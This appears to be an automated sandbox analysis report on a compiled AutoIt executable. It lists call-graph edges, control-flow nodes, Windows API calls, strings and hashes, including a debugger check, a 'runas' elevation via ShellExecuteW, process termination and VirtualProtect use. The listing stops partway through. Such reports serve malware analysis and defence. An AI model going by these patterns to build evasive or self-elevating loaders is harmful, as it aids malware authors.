106599 81ffef 106598->106599 106600 807667 59 API calls 106599->106600 106601 81ff3b 106600->106601 106601->106551 106603 807667 59 API calls 106602->106603 106604 815aa5 106603->106604 106604->106565 106605->106591 106607 84416f 106611 855fe6 106607->106611 106609 84417a 106610 855fe6 85 API calls 106609->106610 106610->106609 106612 856020 106611->106612 106617 855ff3 106611->106617 106612->106609 106613 856022 106623 809328 84 API calls Mailbox 106613->106623 106615 856027 106616 809837 84 API calls 106615->106616 106618 85602e 106616->106618 106617->106612 106617->106613 106617->106615 106620 85601a 106617->106620 106619 807b2e 59 API calls 106618->106619 106619->106612 106622 8095a0 59 API calls _wcsstr 106620->106622 106622->106612 106623->106615 106624 80107d 106629 80708b 106624->106629 106626 80108c 106627 822d40 __cinit 67 API calls 106626->106627 106628 801096 106627->106628 106630 80709b __write_nolock 106629->106630 106631 807667 59 API calls 106630->106631 106632 807151 106631->106632 106633 804706 61 API calls 106632->106633 106634 80715a 106633->106634 106660 82050b 106634->106660 106637 807cab 59 API calls 106638 807173 106637->106638 106639 803f74 59 API calls 106638->106639 106640 807182 106639->106640 106641 807667 59 API calls 106640->106641 106642 80718b 106641->106642 106643 807d8c 59 API calls 106642->106643 106644 807194 RegOpenKeyExW 106643->106644 106645 83e8b1 RegQueryValueExW 106644->106645 106649 8071b6 Mailbox 106644->106649 106646 83e943 RegCloseKey 106645->106646 106647 83e8ce 106645->106647 106646->106649 106653 83e955 _wcscat Mailbox __wsetenvp 106646->106653 106648 820db6 Mailbox 59 API calls 106647->106648 106650 83e8e7 106648->106650 106649->106626 106652 80522e 59 API calls 106650->106652 106651 8079f2 59 API calls 106651->106653 106654 83e8f2 RegQueryValueExW 106652->106654 106653->106649 106653->106651 106658 807de1 59 API calls 106653->106658 106659 803f74 59 API calls 106653->106659 106655 83e90f 106654->106655 106657 83e929 106654->106657 106656 807bcc 59 API calls 106655->106656 106656->106657 106657->106646 106658->106653 106659->106653 106661 831940 __write_nolock 106660->106661 106662 820518 GetFullPathNameW 106661->106662 106663 82053a 106662->106663 106664 807bcc 59 API calls 106663->106664 106665 807165 106664->106665 106665->106637 106666 83fdfc 106704 80ab30 Mailbox _memmove 106666->106704 106672 80b525 106733 869e4a 89 API calls 4 library calls 106672->106733 106673 840055 106732 869e4a 89 API calls 4 library calls 106673->106732 106674 820db6 59 API calls Mailbox 106691 809f37 Mailbox 106674->106691 106677 80b475 106681 808047 59 API calls 106677->106681 106679 840064 106689 80a057 106681->106689 106682 80b47a 106682->106673 106694 8409e5 106682->106694 106684 807667 59 API calls 106684->106691 106685 808047 59 API calls 106685->106691 106687 856e8f 59 API calls 106687->106691 106688 822d40 67 API calls __cinit 106688->106691 106690 807de1 59 API calls 106690->106704 106691->106673 106691->106674 106691->106677 106691->106682 106691->106684 106691->106685 106691->106687 106691->106688 106691->106689 106692 8409d6 106691->106692 106695 80a55a 106691->106695 106721 80c8c0 331 API calls 2 library calls 106691->106721 106722 80b900 60 API calls Mailbox 106691->106722 106738 869e4a 89 API calls 4 library calls 106692->106738 106739 869e4a 89 API calls 4 library calls 106694->106739 106737 869e4a 89 API calls 4 library calls 106695->106737 106698 820db6 59 API calls Mailbox 106698->106704 106699 80b2b6 106726 80f6a3 331 API calls 106699->106726 106701 809ea0 331 API calls 106701->106704 106702 84086a 106735 809c90 59 API calls Mailbox 106702->106735 106704->106672 106704->106689 106704->106690 106704->106691 106704->106698 106704->106699 106704->106701 106704->106702 106705 840878 106704->106705 106707 84085c 106704->106707 106708 80b21c 106704->106708 106711 856e8f 59 API calls 106704->106711 106715 87df37 106704->106715 106718 87df23 106704->106718 106723 809c90 59 API calls Mailbox 106704->106723 106727 87c193 85 API calls 2 library calls 106704->106727 106728 87c2e0 96 API calls Mailbox 106704->106728 106729 867956 59 API calls Mailbox 106704->106729 106730 87bc6b 331 API calls Mailbox 106704->106730 106731 85617e 59 API calls Mailbox 106704->106731 106736 869e4a 89 API calls 4 library calls 106705->106736 106707->106689 106734 85617e 59 API calls Mailbox 106707->106734 106724 809d3c 60 API calls Mailbox 106708->106724 106710 80b22d 106725 809d3c 60 API calls Mailbox 106710->106725 106711->106704 106740 87cadd 106715->106740 106717 87df47 106717->106704 106719 87cadd 130 API calls 106718->106719 106720 87df33 106719->106720 106720->106704 106721->106691 106722->106691 106723->106704 106724->106710 106725->106699 106726->106672 106727->106704 106728->106704 106729->106704 106730->106704 106731->106704 106732->106679 106733->106707 106734->106689 106735->106707 106736->106707 106737->106689 106738->106694 106739->106689 106741 809837 84 API calls 106740->106741 106742 87cb1a 106741->106742 106746 87cb61 Mailbox 106742->106746 106778 87d7a5 106742->106778 106744 87cf2e 106817 87d8c8 92 API calls Mailbox 106744->106817 106746->106717 106748 87cbb2 Mailbox 106748->106746 106750 809837 84 API calls 106748->106750 106765 87cdb9 106748->106765 106810 87fbce 59 API calls 2 library calls 106748->106810 106811 87cfdf 61 API calls 2 library calls 106748->106811 106749 87cf3d 106751 87cdc7 106749->106751 106753 87cf49 106749->106753 106750->106748 106791 87c96e 106751->106791 106753->106746 106757 87ce00 106806 820c08 106757->106806 106760 87ce33 106763 8092ce 59 API calls 106760->106763 106761 87ce1a 106812 869e4a 89 API calls 4 library calls 106761->106812 106766 87ce3f 106763->106766 106764 87ce25 GetCurrentProcess TerminateProcess 106764->106760 106765->106744 106765->106751 106767 809050 59 API calls 106766->106767 106768 87ce55 106767->106768 106777 87ce7c 106768->106777 106813 808d40 59 API calls Mailbox 106768->106813 106769 87cfa4 106769->106746 106774 87cfb8 FreeLibrary 106769->106774 106771 87ce6b 106814 87d649 107 API calls _free 106771->106814 106774->106746 106777->106769 106815 808d40 59 API calls Mailbox 106777->106815 106816 809d3c 60 API calls Mailbox 106777->106816 106818 87d649 107 API calls _free 106777->106818 106779 807e4f 59 API calls 106778->106779 106780 87d7c0 CharLowerBuffW 106779->106780 106819 85f167 106780->106819 106784 807667 59 API calls 106785 87d7f9 106784->106785 106786 80784b 59 API calls 106785->106786 106788 87d810 106786->106788 106787 87d858 Mailbox 106787->106748 106789 807d2c 59 API calls 106788->106789 106790 87d81c Mailbox 106789->106790 106790->106787 106826 87cfdf 61 API calls 2 library calls 106790->106826 106792 87c989 106791->106792 106796 87c9de 106791->106796 106793 820db6 Mailbox 59 API calls 106792->106793 106794 87c9ab 106793->106794 106795 820db6 Mailbox 59 API calls 106794->106795 106794->106796 106795->106794 106797 87da50 106796->106797 106798 87dc79 Mailbox 106797->106798 106805 87da73 _strcat _wcscpy __wsetenvp 106797->106805 106798->106757 106799 809be6 59 API calls 106799->106805 106800 809b3c 59 API calls 106800->106805 106801 809b98 59 API calls 106801->106805 106802 809837 84 API calls 106802->106805 106803 82571c 58 API calls std::exception::_Copy_str 106803->106805 106805->106798 106805->106799 106805->106800 106805->106801 106805->106802 106805->106803 106829 865887 61 API calls 2 library calls 106805->106829 106808 820c1d 106806->106808 106807 820cb5 VirtualProtect 106809 820c83 106807->106809 106808->106807 106808->106809 106809->106760 106809->106761 106810->106748 106811->106748 106812->106764 106813->106771 106814->106777 106815->106777 106816->106777 106817->106749 106818->106777 106820 85f192 __wsetenvp 106819->106820 106821 85f1d1 106820->106821 106824 85f1c7 106820->106824 106825 85f278 106820->106825 106821->106784 106821->106790 106824->106821 106827 8078c4 61 API calls 106824->106827 106825->106821 106828 8078c4 61 API calls 106825->106828 106826->106787 106827->106824 106828->106825 106829->106805

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                              • Part of subcall function 0081092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00803C14,008C52F8,?,?,?), ref: 0081096E
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008B7770,00000010), ref: 0083D281
                                                                            • SetCurrentDirectoryW.KERNEL32(?,008C52F8,?,?,?), ref: 0083D2B9
                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008B4260,008C52F8,?,?,?), ref: 0083D33F
                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0083D346
                                                                              • Part of subcall function 00803A46: GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                                              • Part of subcall function 00803A46: LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                                              • Part of subcall function 00803A46: LoadIconW.USER32(00000063), ref: 00803A76
                                                                              • Part of subcall function 00803A46: LoadIconW.USER32(000000A4), ref: 00803A88
                                                                              • Part of subcall function 00803A46: LoadIconW.USER32(000000A2), ref: 00803A9A
                                                                              • Part of subcall function 00803A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                                              • Part of subcall function 00803A46: RegisterClassExW.USER32(?), ref: 00803B16
                                                                              • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                                              • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                                              • Part of subcall function 008039D5: ShowWindow.USER32(00000000,?,?), ref: 00803A38
                                                                              • Part of subcall function 008039D5: ShowWindow.USER32(00000000,?,?), ref: 00803A41
                                                                              • Part of subcall function 0080434A: _memset.LIBCMT ref: 00804370
                                                                              • Part of subcall function 0080434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                                            Strings
                                                                            • runas, xrefs: 0083D33A
                                                                            • This is a third-party compiled AutoIt script., xrefs: 0083D279
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                            • API String ID: 529118366-3287110873
                                                                            • Opcode ID: 953347e3ce34b85ac67399ec25cb8d6a039133ec146bad463495ceada5a5e0db
                                                                            • Instruction ID: 526d67c82e3ad8c2269c2bab4ea202bee51b4bfb3111791523cbb898509d9d0c
                                                                            • Opcode Fuzzy Hash: 953347e3ce34b85ac67399ec25cb8d6a039133ec146bad463495ceada5a5e0db
                                                                            • Instruction Fuzzy Hash: 3A51E971D04248AEDF41EBB8EC05EED7BB9FF45744F004069F511E22E2DA746685CB22

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 996 8049a0-804a00 call 807667 GetVersionExW call 807bcc 1001 804a06 996->1001 1002 804b0b-804b0d 996->1002 1004 804a09-804a0e 1001->1004 1003 83d767-83d773 1002->1003 1005 83d774-83d778 1003->1005 1006 804b12-804b13 1004->1006 1007 804a14 1004->1007 1009 83d77b-83d787 1005->1009 1010 83d77a 1005->1010 1008 804a15-804a4c call 807d2c call 807726 1006->1008 1007->1008 1018 804a52-804a53 1008->1018 1019 83d864-83d867 1008->1019 1009->1005 1012 83d789-83d78e 1009->1012 1010->1009 1012->1004 1014 83d794-83d79b 1012->1014 1014->1003 1016 83d79d 1014->1016 1020 83d7a2-83d7a5 1016->1020 1018->1020 1021 804a59-804a64 1018->1021 1022 83d880-83d884 1019->1022 1023 83d869 1019->1023 1024 804a93-804aaa GetCurrentProcess IsWow64Process 1020->1024 1025 83d7ab-83d7c9 1020->1025 1026 83d7ea-83d7f0 1021->1026 1027 804a6a-804a6c 1021->1027 1030 83d886-83d88f 1022->1030 1031 83d86f-83d878 1022->1031 1028 83d86c 1023->1028 1032 804aac 1024->1032 1033 804aaf-804ac0 1024->1033 1025->1024 1029 83d7cf-83d7d5 1025->1029 1038 83d7f2-83d7f5 1026->1038 1039 83d7fa-83d800 1026->1039 1034 804a72-804a75 1027->1034 1035 83d805-83d811 1027->1035 1028->1031 1036 83d7d7-83d7da 1029->1036 1037 83d7df-83d7e5 1029->1037 1030->1028 1040 83d891-83d894 1030->1040 1031->1022 1032->1033 1041 804ac2-804ad2 call 804b37 1033->1041 1042 804b2b-804b35 GetSystemInfo 1033->1042 1043 83d831-83d834 1034->1043 1044 804a7b-804a8a 1034->1044 1046 83d813-83d816 1035->1046 1047 83d81b-83d821 1035->1047 1036->1024 1037->1024 1038->1024 1039->1024 1040->1031 1055 804ad4-804ae1 call 804b37 1041->1055 1056 804b1f-804b29 GetSystemInfo 1041->1056 1045 804af8-804b08 1042->1045 1043->1024 1049 83d83a-83d84f 1043->1049 1050 804a90 1044->1050 1051 83d826-83d82c 1044->1051 1046->1024 1047->1024 1053 83d851-83d854 1049->1053 1054 83d859-83d85f 1049->1054 1050->1024 1051->1024 1053->1024 1054->1024 1061 804ae3-804ae7 GetNativeSystemInfo 1055->1061 1062 804b18-804b1d 1055->1062 1058 804ae9-804aed 1056->1058 1058->1045 1060 804aef-804af2 FreeLibrary 1058->1060 1060->1045 1061->1058 1062->1061
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 008049CD
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            • GetCurrentProcess.KERNEL32(?,0088FAEC,00000000,00000000,?), ref: 00804A9A
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00804AA1
                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00804AE7
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00804AF2
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00804B23
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00804B2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 1986165174-0
                                                                            • Opcode ID: 89f422ed27847641926d4c6dd9d185391385ccc97a6dc66371dd665b8810f9de
                                                                            • Instruction ID: b10d205ea033adba83fc8e67b2355fd11bf677c403082a6a9acb533dc0928d41
                                                                            • Opcode Fuzzy Hash: 89f422ed27847641926d4c6dd9d185391385ccc97a6dc66371dd665b8810f9de
                                                                            • Instruction Fuzzy Hash: F991C47198A7C4DECB71DB6898501AABFE5FF29300F444D6DD1C7D3A42D224B908C759

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1104 804e89-804ea1 CreateStreamOnHGlobal 1105 804ec1-804ec6 1104->1105 1106 804ea3-804eba FindResourceExW 1104->1106 1107 83d933-83d942 LoadResource 1106->1107 1108 804ec0 1106->1108 1107->1108 1109 83d948-83d956 SizeofResource 1107->1109 1108->1105 1109->1108 1110 83d95c-83d967 LockResource 1109->1110 1110->1108 1111 83d96d-83d975 1110->1111 1112 83d979-83d98b 1111->1112 1112->1108
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00804D8E,?,?,00000000,00000000), ref: 00804E99
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00804D8E,?,?,00000000,00000000), ref: 00804EB0
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D937
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D94C
                                                                            • LockResource.KERNEL32(00804D8E,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F,00000000), ref: 0083D95F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                                            • Instruction ID: 860dac924a498c71447fd27fa3966ea32e2ffa7db209795f2ff958c85ec12be7
                                                                            • Opcode Fuzzy Hash: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                                            • Instruction Fuzzy Hash: 3E115EB5240701BFD7218B69EC48F677BBAFBC5B21F204268F605C62A0DB61E8018660
                                                                            APIs
                                                                            • IsThemeActive.UXTHEME ref: 00804834
                                                                              • Part of subcall function 0082336C: __lock.LIBCMT ref: 00823372
                                                                              • Part of subcall function 0082336C: DecodePointer.KERNEL32(00000001,?,00804849,00857C74), ref: 0082337E
                                                                              • Part of subcall function 0082336C: EncodePointer.KERNEL32(?,?,00804849,00857C74), ref: 00823389
                                                                              • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00804915
                                                                              • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0080492A
                                                                              • Part of subcall function 00803B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                                              • Part of subcall function 00803B3A: IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                                              • Part of subcall function 00803B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                                              • Part of subcall function 00803B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00804874
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                            • String ID: 8o$H
                                                                            • API String ID: 1438897964-2661627418
                                                                            • Opcode ID: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                                            • Instruction ID: 4d6dc8ecc2359bbd7fb985a9ef95dd2371e1b4fcbb090c91f26035e478fc8bc5
                                                                            • Opcode Fuzzy Hash: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                                            • Instruction Fuzzy Hash: 74118E719043459BCB00EF28EC0590ABBF8FB94750F10892EF480C32B2DB709A49CB96
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID:
                                                                            • API String ID: 3964851224-0
                                                                            • Opcode ID: 8a77ccfe6b68d02fe8cac6af6eeed8bd37b0e19bcb78b88585110b86079e2e71
                                                                            • Instruction ID: e63332bdae6ce814d37244de3c71d6f42ace18d0b3ed663a4cc8832801a6d976
                                                                            • Opcode Fuzzy Hash: 8a77ccfe6b68d02fe8cac6af6eeed8bd37b0e19bcb78b88585110b86079e2e71
                                                                            • Instruction Fuzzy Hash: D99238745083458FD720DF18C880B6ABBE5FF85314F14892DE89ADB252D7B5E885CF92
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,0083E398), ref: 0086446A
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 0086447B
                                                                            • FindClose.KERNEL32(00000000), ref: 0086448B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                                            • Instruction ID: e4ca996805886ad67bdd514928558976a7c6456fe2c7763fb1fbb7b1512c703e
                                                                            • Opcode Fuzzy Hash: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                                            • Instruction Fuzzy Hash: C6E0D8324115046B42106B3CEC0E4ED775CFE45335F100715F935D11D0EB7499009799
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Variable must be of type 'Object'.$x-
                                                                            • API String ID: 0-183146980
                                                                            • Opcode ID: d87caf6ee058c49dc521a1e5c68513f74d996ef65ef216d15f90bde3f96b13e0
                                                                            • Instruction ID: d641a92d8e24dbfcfec89a9105817c11d0c3885eb7e81b0f53b0ca0f56fe85bc
                                                                            • Opcode Fuzzy Hash: d87caf6ee058c49dc521a1e5c68513f74d996ef65ef216d15f90bde3f96b13e0
                                                                            • Instruction Fuzzy Hash: 2BA2D074A00219CFCB64CF58C880AAEB7B2FF58314F248869E905EB391D775ED42CB91
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810A5B
                                                                            • timeGetTime.WINMM ref: 00810D16
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810E53
                                                                            • Sleep.KERNEL32(0000000A), ref: 00810E61
                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00810EFA
                                                                            • DestroyWindow.USER32 ref: 00810F06
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00810F20
                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00844E83
                                                                            • TranslateMessage.USER32(?), ref: 00845C60
                                                                            • DispatchMessageW.USER32(?), ref: 00845C6E
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00845C82
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                            • API String ID: 4212290369-3242690629
                                                                            • Opcode ID: d71a7812e2f73a437c3805056b74ec2f7719f861501bfc34fbc6c34906274e02
                                                                            • Instruction ID: 53ff1a6e13dbc9cde6d57b4c288014216483280048ef92f8c3827699a7696c07
                                                                            • Opcode Fuzzy Hash: d71a7812e2f73a437c3805056b74ec2f7719f861501bfc34fbc6c34906274e02
                                                                            • Instruction Fuzzy Hash: 92B27C70608745DFD724DB28C885BAEB7E5FF84304F14491DE59AD72A2DBB1E884CB82

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00868F5F: __time64.LIBCMT ref: 00868F69
                                                                              • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                                            • __wsplitpath.LIBCMT ref: 00869234
                                                                              • Part of subcall function 008240FB: __wsplitpath_helper.LIBCMT ref: 0082413B
                                                                            • _wcscpy.LIBCMT ref: 00869247
                                                                            • _wcscat.LIBCMT ref: 0086925A
                                                                            • __wsplitpath.LIBCMT ref: 0086927F
                                                                            • _wcscat.LIBCMT ref: 00869295
                                                                            • _wcscat.LIBCMT ref: 008692A8
                                                                              • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FDE
                                                                              • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FED
                                                                            • _wcscmp.LIBCMT ref: 008691EF
                                                                              • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
